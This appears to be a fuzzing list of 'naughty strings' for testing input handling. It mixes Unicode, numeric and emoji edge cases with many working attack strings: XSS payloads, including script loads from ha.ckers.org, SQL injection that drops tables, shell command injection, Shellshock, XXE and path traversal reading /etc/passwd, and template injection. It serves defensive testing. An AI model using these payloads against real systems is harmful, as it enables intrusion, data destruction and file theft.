"""&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert(‘208’)"&gt; | &lt;IMG SRC= onmouseover="alert(‘209’)"&gt; | &lt;IMG onmouseover="alert(‘210’)"&gt; | &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt; | &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000050&amp;#0000049&amp;#0000050&amp;#0000039&amp;#0000041&gt; | &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt; | &lt;IMG SRC="jav   ascript:alert(‘214’);"&gt; | &lt;IMG SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt; | &lt;IMG SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt; | &lt;IMG SRC=“jav&amp;#x0D;ascript:alert(‘217’);"&gt; | perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out | &lt;IMG SRC=” &amp;#14;  javascript:alert(‘219’);"&gt; | &lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt; | &lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt; | &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; | &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; | &lt;IMG SRC=“javascript:alert(‘222’)” | &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; | \";alert(‘223’);// | &lt;u oncopy=alert()&gt; Copy me&lt;/u&gt; | &lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt; | &lt;plaintext&gt; | http://a/%%30%30 | &lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt; | 1;DROP TABLE users | 1'; DROP TABLE users-- 1 | ' OR 1=1 -- 1 | ' OR ‘1’='1 | '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- |   | % | _ | - | -- | --version | --help | $USER | /dev/null; touch /tmp/blns.fail ; echo | `touch /tmp/blns.fail` | $(touch /tmp/blns.fail) | @{[system “touch /tmp/blns.fail”]} | eval("puts ‘hello world’") | System("ls -al /") | `ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x(‘ls -al /') | &lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{‘HOME’} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; } | &lt;&lt;&lt; %s(un='%s’) = %u | +++ATH0 | CON | PRN | AUX | CLOCK$ | NUL | A: | ZZ: | COM1 | LPT1 | LPT2 | LPT3 | COM2 | COM3 | COM4 | DCC SEND STARTKEYLOGGER 0 0 0 | Scunthorpe General Hospital | Penistone Community Church | Lightwater Country Park | Jimmy Clitheroe | Horniman Museum | shitake mushrooms | RomansInSussex.co.uk | http://www.cum.qc.ca/ | Craig Cockburn, Software Specialist | Linda Callahan | Dr. Herman I. Libshitz | magna cum laude | Super Bowl XXX | medieval erection of parapets | evaluate | mocha | expression | Arsenal canal | classic | Tyson Gay | Dick Van Dyke | basement | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | But now...[20Cfor my greatest trick...[8m | The quick brown fox... [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print ‘x’ * 64 * 1024**3 %} | {{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read() }} | En dash – | Em dash — | Horizontal bar ― | Figure dash ‒ | Swung dash ⁓ | Single opening quote ‘ | Single closing quote ’ | Double opening quote “ | Double closing quote ” | Copyright © | Registered ® | Trademark ™ | Section § | Paragraph ¶ | Ellipsis … | Optional hyphen ¬ | Non-breaking hyphen ߛ | Em space ߓ | En space ߒ | Quarter space ߕ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undefined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undef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null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NULL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(null)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nil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NIL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true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false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True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False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TRUE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FALSE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None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hasOwnProperty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then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constructor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\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\\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$1.00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1/2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1E2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1E02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1E+02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-1.00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-$1.00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-1/2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-1E2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-1E02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-1E+02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1/0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0/0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-2147483648/-1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-9223372036854775808/-1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-0.0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+0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+0.0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0..0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.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0.0.0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0,00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0,,0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,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0,0,0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0.0/0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1.0/0.0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0.0/0.0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1,0/0,0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0,0/0,0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--1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-.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-,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999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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NaN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Infinity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-Infinity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INF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1#INF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-1#IND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1#QNAN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1#SNAN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1#IND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0x0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0xffffffff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0xffffffffffffffff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0xabad1dea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123456789012345678901234567890123456789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1,000.00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1 000.00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1'000.00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1,000,000.00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1 000 000.00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1'000'000.00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1.000,00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1 000,00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1'000,00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1.000.000,00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1 000 000,00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1'000'000,00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01000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08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09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2.2250738585072011e-308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,./;'[]\-=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&lt;&gt;?:"{}|_+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!@#$%^&amp;*()`~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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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\t \u0085             ​\u2028\u2029  　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­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿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﻿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/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Ω≈ç√∫˜µ≤≥÷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åß∂ƒ©˙∆˚¬…æ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œ∑´®†¥¨ˆøπ“‘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¡™£¢∞§¶•ªº–≠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¸˛Ç◊ı˜Â¯˘¿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ÅÍÎÏ˝ÓÔÒÚÆ☃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Œ„´‰ˇÁ¨ˆØ∏”’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`⁄€‹›ﬁﬂ‡°·‚—±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⅛⅜⅝⅞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ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя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٠١٢٣٤٥٦٧٨٩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⁰⁴⁵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₀₁₂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⁰⁴⁵₀₁₂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''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“”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‘"’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“''''"'”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“'"'"''''”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&lt;foo val=“bar” /&gt;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&lt;foo val=“bar” /&gt;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&lt;foo val=”bar“ /&gt;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&lt;foo val=`bar' /&gt;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田中さんにあげて下さい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パーティーへ行かないか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和製漢語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部落格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사회과학원 어학연구소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찦차를 타고 온 펲시맨과 쑛다리 똠방각하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社會科學院語學研究所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울란바토르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𠜎𠜱𠝹𠱓𠱸𠲖𠳏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𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆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表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ポ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あ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鷗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Œ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é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Ｂ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逍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Ü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ß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ª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ą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ñ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丂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㐀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𠀀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Ⱥ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Ⱦ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ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ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(｡◕ ∀ ◕｡)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｀ｨ(´∀｀∩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__ﾛ(,_,*)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・(￣∀￣)・:*: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ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ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,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’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(╯°□°）╯︵ ┻━┻)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(ﾉಥ益ಥ）ﾉ﻿ ┻━┻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┬─┬ノ( º _ ºノ)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( ͡° ͜ʖ ͡°)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¯\_(ツ)_/¯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😍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👩🏽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👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️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👾 🙇 💁 🙅 🙆 🙋 🙎 🙍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🐵 🙈 🙉 🙊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❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙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✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿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👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦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🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧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0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟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🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸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🇺🇸🇷🇺🇸🇦🇫🇦🇲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🇺🇸🇷🇺🇸🇦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１２３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١٢٣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ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.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בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ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הָיְתָהtestالصفحات التّحول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﷽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ﷺ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مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،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الكل في المجمو عة (5)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᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜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᚛                 ᚜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‪‪test‪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‫test‫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 test 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test⁠test‫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⁦test⁧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Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣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̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰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̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟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̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕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Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮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˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥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00˙Ɩ$-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Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ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𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠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𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌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𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈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𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰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𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘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𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐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⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢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&lt;script&gt;alert(0)&lt;/script&gt;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&amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt;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 onerror=alert(2) /&gt;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&lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt;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"&gt;&lt;script&gt;alert(4)&lt;/script&gt;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'&gt;&lt;script&gt;alert(5)&lt;/script&gt;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&gt;&lt;script&gt;alert(6)&lt;/script&gt;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&lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt;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 / script &gt;&lt; script &gt;alert(8)&lt; / script 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 onfocus=JaVaSCript:alert(9) autofocus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 onfocus=JaVaSCript:alert(10) autofocus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 onfocus=JaVaSCript:alert(11) autofocus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＜script＞alert(12)＜/script＞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&lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt;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--&gt;&lt;script&gt;alert(14)&lt;/script&gt;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“;alert(15);t=”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‘;alert(16);t=’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JavaSCript:alert(17)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;alert(18);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src=JaVaSCript:prompt(19)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“&gt;&lt;script&gt;alert(20);&lt;/script x=”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‘&gt;&lt;script&gt;alert(21);&lt;/script x=’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&gt;&lt;script&gt;alert(22);&lt;/script x=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 autofocus onkeyup="javascript:alert(23)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 autofocus onkeyup='javascript:alert(24)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&lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt;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&lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt;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&lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt;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&lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt;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&lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt;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&lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt;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&lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt;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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt;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'`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;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style="x\x3Aexpression(javascript:alert(34)"&gt;DEF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style="x:expression\x5C(javascript:alert(35)"&gt;DEF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style="x:expression\x00(javascript:alert(36)"&gt;DEF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style="x:exp\x00ression(javascript:alert(37)"&gt;DEF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style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF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style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF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style="x:\x09expression(javascript:alert(40)"&gt;DEF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style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF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style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF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style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF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style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF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style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF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style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF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style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF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style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF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style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF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style="x:\x20expression(javascript:alert(50)"&gt;DEF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style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF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style="x:\x00expression(javascript:alert(52)"&gt;DEF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style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF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style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF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style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF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style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF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style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF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style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF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style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF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style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF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href="\x0Bjavascript:javascript:alert(61)"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href="\x0Fjavascript:javascript:alert(62)"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href="\xC2\xA0javascript:javascript:alert(63)"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href="\x05javascript:javascript:alert(64)"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href="\xE1\xA0\x8Ejavascript:javascript:alert(65)"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href="\x18javascript:javascript:alert(66)"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href="\x11javascript:javascript:alert(67)"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href="\xE2\x80\x88javascript:javascript:alert(68)"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href="\xE2\x80\x89javascript:javascript:alert(69)"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href="\xE2\x80\x80javascript:javascript:alert(70)"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href="\x17javascript:javascript:alert(71)"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href="\x03javascript:javascript:alert(72)"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href="\x0Ejavascript:javascript:alert(73)"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href="\x1Ajavascript:javascript:alert(74)"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href="\x00javascript:javascript:alert(75)"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href="\x10javascript:javascript:alert(76)"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href="\xE2\x80\x82javascript:javascript:alert(77)"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href="\x20javascript:javascript:alert(78)"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href="\x13javascript:javascript:alert(79)"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href="\x09javascript:javascript:alert(80)"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href="\xE2\x80\x8Ajavascript:javascript:alert(81)"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href="\x14javascript:javascript:alert(82)"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href="\x19javascript:javascript:alert(83)"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href="\xE2\x80\xAFjavascript:javascript:alert(84)"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href="\x1Fjavascript:javascript:alert(85)"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href="\xE2\x80\x81javascript:javascript:alert(86)"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href="\x1Djavascript:javascript:alert(87)"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href="\xE2\x80\x87javascript:javascript:alert(88)"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href="\x07javascript:javascript:alert(89)"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href="\xE1\x9A\x80javascript:javascript:alert(90)"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href="\xE2\x80\x83javascript:javascript:alert(91)"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href="\x04javascript:javascript:alert(92)"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href="\x01javascript:javascript:alert(93)"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href="\x08javascript:javascript:alert(94)"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href="\xE2\x80\x84javascript:javascript:alert(95)"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href="\xE2\x80\x86javascript:javascript:alert(96)"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href="\xE3\x80\x80javascript:javascript:alert(97)"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href="\x12javascript:javascript:alert(98)"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href="\x0Djavascript:javascript:alert(99)"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href="\x0Ajavascript:javascript:alert(100)"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href="\x0Cjavascript:javascript:alert(101)"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href="\x15javascript:javascript:alert(102)"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href="\xE2\x80\xA8javascript:javascript:alert(103)"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href="\x16javascript:javascript:alert(104)"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href="\x02javascript:javascript:alert(105)"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href="\x1Bjavascript:javascript:alert(106)"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href="\x06javascript:javascript:alert(107)"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href="\xE2\x80\xA9javascript:javascript:alert(108)"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href="\xE2\x80\x85javascript:javascript:alert(109)"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href="\x1Ejavascript:javascript:alert(110)"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href="\xE2\x81\x9Fjavascript:javascript:alert(111)"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href="\x1Cjavascript:javascript:alert(112)"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href=“javascript\x00:javascript:alert(113)”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href=“javascript\x3A:javascript:alert(114)”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href=“javascript\x09:javascript:alert(115)”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href=“javascript\x0D:javascript:alert(116)”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href=“javascript\x0A:javascript:alert(117)” id=“fuzzelement1”&gt;test&lt;/a&gt;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\x0Aonerror=javascript:alert(118)&gt;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\x22onerror=javascript:alert(119)&gt;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\x0Bonerror=javascript:alert(120)&gt;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\x0Donerror=javascript:alert(121)&gt;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\x2Fonerror=javascript:alert(122)&gt;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\x09onerror=javascript:alert(123)&gt;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\x0Conerror=javascript:alert(124)&gt;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\x00onerror=javascript:alert(125)&gt;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\x27onerror=javascript:alert(126)&gt;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\x20onerror=javascript:alert(127)&gt;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"`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt;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"`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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\x00src=x onerror="alert(165)"&gt;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\x47src=x onerror="javascript:alert(166)"&gt;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\x11src=x onerror="javascript:alert(167)"&gt;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\x12src=x onerror="javascript:alert(168)"&gt;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&lt;img\x47src=x onerror="javascript:alert(169)"&gt;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&lt;img\x10src=x onerror="javascript:alert(170)"&gt;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&lt;img\x13src=x onerror="javascript:alert(171)"&gt;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&lt;img\x32src=x onerror="javascript:alert(172)"&gt;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&lt;img\x47src=x onerror="javascript:alert(173)"&gt;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&lt;img\x11src=x onerror="javascript:alert(174)"&gt;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\x47src=x onerror="javascript:alert(175)"&gt;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\x34src=x onerror="javascript:alert(176)"&gt;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\x39src=x onerror="javascript:alert(177)"&gt;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\x00src=x onerror="javascript:alert(178)"&gt;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src\x09=x onerror="javascript:alert(179)"&gt;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src\x10=x onerror="javascript:alert(180)"&gt;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src\x13=x onerror="javascript:alert(181)"&gt;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src\x32=x onerror="javascript:alert(182)"&gt;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src\x12=x onerror="javascript:alert(183)"&gt;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src\x11=x onerror="javascript:alert(184)"&gt;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src\x00=x onerror="javascript:alert(185)"&gt;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src\x47=x onerror="javascript:alert(186)"&gt;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src=x\x09onerror="javascript:alert(187)"&gt;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src=x\x10onerror="javascript:alert(188)"&gt;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src=x\x11onerror="javascript:alert(189)"&gt;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src=x\x12onerror="javascript:alert(190)"&gt;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src=x\x13onerror="javascript:alert(191)"&gt;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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;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 onerror=\x09"javascript:alert(193)"&gt;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 onerror=\x10"javascript:alert(194)"&gt;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 onerror=\x11"javascript:alert(195)"&gt;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 onerror=\x12"javascript:alert(196)"&gt;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 onerror=\x32"javascript:alert(197)"&gt;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 onerror=\x00"javascript:alert(198)"&gt;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href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt;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src="x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt;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 onerror /" '"= alt=javascript:alert(201)//"&gt;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&lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt;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href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;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&lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script 